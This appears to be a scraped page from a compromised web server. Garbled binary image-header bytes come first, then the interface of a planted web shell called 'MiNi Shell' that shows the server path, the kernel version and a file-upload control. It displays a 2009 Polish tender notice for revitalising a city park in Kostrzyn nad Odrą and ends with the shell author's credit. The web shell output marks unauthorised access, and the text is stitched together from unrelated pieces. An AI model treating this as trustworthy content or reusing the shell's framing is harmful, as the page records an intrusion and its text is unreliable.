JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090406/94094-N-2009.html

<p class="kh_header"><b>Kostrzyn: Rewitalizacja Parku Miejskiego w Kostrzynie nad Odrą</b><br>
<b>Numer ogłoszenia: 94094 - 2009; data zamieszczenia: 06.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Kostrzyn nad Odrą , ul. Kopernika 1, 66-470 Kostrzyn, woj. lubuskie, tel. 095 7278160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kostrzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja Parku Miejskiego w Kostrzynie nad Odrą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane obejmujące rewitalizację Parku Miejskiego w Kostrzynie nad Odrą o łącznej powierzchni ok. 4 ha. 
Zakres robót obejmuje m.in.:
ETAP I
-rozbiórka istniejących nawierzchni ciągów komunikacyjnych, oraz elementów wyposażenia terenu (ławki, kosze na śmieci, urządzenia placów zabaw, system oświetleniowy, murki kamienne)
-	budowa przyłącza wodociągowego i sieci wodociągowej zasilającej fontannę i krany czerpalne
-	budowa linii oświetlenia ciągów komunikacyjnych, iluminacji świetlnych rzeźb i drzew oraz linii zasilającej fontannę,    
-	wykonanie nowych nawierzchni placów i alejek: z kostki granitowej, z kostki betonowej, nawierzchni żwirowej, nawierzchni piaszczystej oraz drewnianej,
-	budowa elementów małej architektury obejmująca fontannę oraz cokoły pod rzeźby figuralne,
-	montaż elementów wyposażenia terenu (ławki, kosze na śmieci, stojaki na rowery, tablice informacyjne) 
-	montaż wyposażenia placów zabaw dla dzieci i placu dla młodzieży,
-	wykonanie zabiegów pielęgnacyjnych istniejącej szaty roślinnej i gospodarka drzewostanem,
-	urządzenie nowej szaty roślinnej, 
ETAP II
-	pielęgnacja szaty roślinnej w okresie 12 miesięcy od daty odbioru końcowego I etapu.

Szczegółowy zakres robót określają: projekt budowlany/wykonawczy modernizacji parku miejskiego w Kostrzynie nad Odrą, specyfikacja techniczna warunków wykonania i odbioru robót, przedmiary robót, kosztorysy nakładcze oraz wskazania do pielęgnacji, stanowiące załączniki do niniejszej specyfikacji istotnych warunków zamówienia. 
Postępowanie prowadzone jest w trybie przetargu nieograniczonego o wartości szacunkowej poniżej progów ustalonych na podstawie art. 11 ust. 8 Prawa zamówień publicznych tj. 5.150.000 Euro .
Zakres zamówienia obejmuje równocześnie roboty budowlane, które stanowią 70 % wartości zamówienia oraz usługi, stanowiące 30% wartości zamówienia.  Podstawa prawna udzielenia zamówienia publicznego: art.6 ust.1, art. 10 oraz art. 39 podstawa prawna ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych t. j. Dz. U. z 2007 r. Nr 223, poz. 1655, ze zmianami)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.11-2, 45.23.32.00-1, 45.10.00.00-8, 45.11.13.00-1, 45.23.30.00-9, 45.31.00.00-3, 45.23.13.00-8, 45.26.25.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 50.000 zł (słownie: pięćdziesiąt tysięcy złotych).
2. Wykonawca wnosi wadium: - w pieniądzu, sposób przekazania: przelewem na numer rachunku bankowego zamawiającego:  86 8355 0009 0024 2963 2000 0005 tyt. wadium przetargowe - Rewitalizacja Parku Miejskiego
- w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,  - w gwarancjach bankowych,
- w gwarancjach ubezpieczeniowych, 
- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275).  3. Wadium wniesione w formie przelewu pieniężnego winno znaleźć się na rachunku Zamawiającego  najpóźniej do dnia i godziny wyznaczonej jako termin składania ofert.  4. Zwrot wadium nastąpi zgodnie z art. 46 ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków: Spełniają wymagania zgodnie  z art. 22. ust. 1 ustawy z dnia 29 stycznia  2004r. Prawo zamówień publicznych, a nadto:  
1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;  1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.2.1 Doświadczenie 
a)  wykonali w okresie ostatnich pięciu lat  przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia t.j.:
-co najmniej jedno zadanie polegające na wykonaniu nawierzchni z kostki betonowej        i granitowej o łącznej powierzchni jednego zadania nie mniejszej niż 3000 m2
-	co najmniej jedno zadania polegające na budowie fontanny o wartości nie mniejszej niż 200.000 zł,
-	co najmniej jedno zadania związane z budową linii kablowych i oświetlenia o wartości nie mniejszej niż 150.000 zł,
-	co najmniej jedno zadanie obejmujące budowę sieci wodociągowej o wartości nie mniejszej niż 50.000 zł,
b) wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia jest krótszy, w tym okresie, co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usługom, stanowiącym przedmiot zamówienia polegające na budowie, przebudowie lub modernizacji i zagospodarowaniu terenów zielonych (parków, skwerów, ogrodów) o powierzchni nie mniejszej niż 10.000 m2, obejmujących nasadzenia roślin i wartości nie mniejszej niż 200.000 zł.
Wykonawca spełni warunki określone w pkt. 1.2.1, jeżeli przedstawi realizację jednego zadania zawierającego wszystkie wymienione w tym punkcie elementy, bądź przedstawi kilka zadań obejmujących poszczególne elementy wykonane osobno.
Doświadczenie wykonawcy, o którym mowa w ppkt. a i b  powinno zostać potwierdzone dokumentami należytego wykonania (np.: protokoły odbioru końcowego  lub referencje).
1.2.2 Potencjał kadrowy
a) dysponują lub będą dysponować osobami zdolnymi do wykonania przedmiotu zamówienia obejmujących łącznie 26 osób tj.:
-	1 kierownik robót branży konstrukcyjno - budowlanej - osoba z uprawnieniami budowlanymi w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi bez ograniczeń, lub odpowiadającymi im, ważnymi uprawnieniami budowlanymi, wydanymi na podstawie wcześniej obowiązujących przepisów, posiadająca aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa
-	1 kierownik robót branży elektrycznej - osoba z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do kierowania robotami budowlanymi  lub odpowiadającymi im, ważnymi uprawnieniami budowlanymi, wydanymi na podstawie wcześniej obowiązujących przepisów, posiadająca aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa
-	1 kierownik robót branży sanitarnej - osoba z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do kierowania robotami budowlanymi  lub odpowiadającymi im, ważnymi uprawnieniami budowlanymi, wydanymi na podstawie wcześniej obowiązujących przepisów, posiadająca aktualne członkostwo w Okręgowej Izbie Inżynierów Budownictwa
-	1 kierownik robót branży zieleni osoba posiadająca minimum 3 letnie doświadczenie w kierowaniu pracami przy realizacji obiektów o charakterze zieleńca (park, skwer, ogród), która wykaże się kierowaniem co najmniej dwoma zadaniami polegającymi na nasadzeniu minimum 1000 szt. roślin.
-	3 osoby na stanowisku  brukarz
-	3 osoby na stanowisku kamieniarz
-	5 osoby na stanowisku pracownik ogólnobudowlany
-	3 osoby na stanowisku monter instalacji sanitarnych
-	3 osoby na stanowisku elektromonter
-	5 osób na stanowisku ogrodnik
b) przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych  do wykonania zamówienia, jeżeli wykonawca wskaże w ofercie, osóby przewidziane do realizacji zamówienia, którymi  będzie dysponował.
1.2.3 Potencjał techniczny
a) dysponują lub będą dysponować potencjałem technicznym obejmującym następujące urządzenia i narzędzia:
-	Koparko - ładowarka,
-	Samochód dostawczy,
-	Samochód wieżowo-teleskopowy z balkonem do 12m,
- Samochód skrzyniowy 5-10 t,
-	Żuraw samochodowy 4 t,
-	Ubijak spalinowy 200 kg,
-	Zespół prądotwórczy 3 faz- 5 kVA,
-	Ciągnik kołowy,
-	Walec statyczny samojezdny,
-	Piła motorowa łąńcuchowa,
b) przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli wykonawca wskaże w ofercie, narzędzia i urządzenia, którymi  będzie dysponował.

1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;  1.3.1przedstawią dokument wystawiony przez bank lub spółdzielczą kasę oszczędnościowo-kredytową, w których wykonawca posiada  rachunek stwierdzający wysokość posiadanych środków w kwocie 500.000,00 zł lub zdolność kredytową wykonawcy o wartości 500.000,00 zł, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę  A.2) Dowód wpłaty wadium. W przypadku, gdy Wykonawca wniesie wadium w pieniądzu, winien dołączyć do oferty, kopię dowodu wpłaty na rachunek Zamawiającego, potwierdzoną za zgodność z oryginałem. Wadium w pozostałych formach wpłaty należy w formie oryginału załączyć do oferty.
A.3) Kosztorys ofertowy sporządzony wg. wzoru stanowiącego załącznik nr 5 do formularza ofertowego.
B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty: B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.   B.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.   B.3) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych.    B.4) aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego  potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem , zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
B.5) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające, że wykonawca nie zalega                 z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie,  że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
B.6) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
B.7) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,

C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi                      do wykonania zamówienia należy złożyć następujące dokumenty:  C.1) Wykaz robót budowlanych  wykonanych w okresie ostatnich pięciu i usług wykonanych w okresie ostatnich trzech lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym i usługom, stanowiącym przedmiot zamówienia (zgodnie z pkt.V, ppkt 1.2.1 siwz) z podaniem ich wartości, oraz dat i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty i usługi te zostały wykonane należycie.   
C.2) Wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia,                 a także zakresu wykonywanych przez nich czynności  wraz z załączeniem dokumentów potwierdzających wymagane uprawnienia i przynależność do Okręgowej Izby Inżynierów Budownictwa (zgodnie z pkt.V ppkt. 1.2.2 siwz),
C.3) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych                         do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt.C.2, wykonawca wskazał osoby, którymi będzie dysponował.
C.4) wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca (zgodnie z pkt.V ppkt. 1.2.3 siwz),
C.5) pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, je żeli w wykazie, o którym mowa w pkt.C.4, wykonawca wskazał narzędzi i urządzenia, którymi będzie dysponował.
C.6) Wykaz części zamówienia, które zostaną powierzone podwykonawcom.
 D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:  D.1) Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (zgodnie z pkt. V ppkt.1.3.1 siwz)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 97.00</li>
<li>2 - Gwarancja - 3.00</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kostrzyn.nowoczesnagmina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kostrzyn nad Odrą, Referat Inwestycji i Remontów, ul. Kościuszki 3, pok. nr 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 09:30, miejsce: Urząd Miasta Kostrzyn nad Odrą, ul. Kopernika 1, 66 - 470 Kostrzyn nad Odrą, Sekretariat, pok. nr 8.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 27.05.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com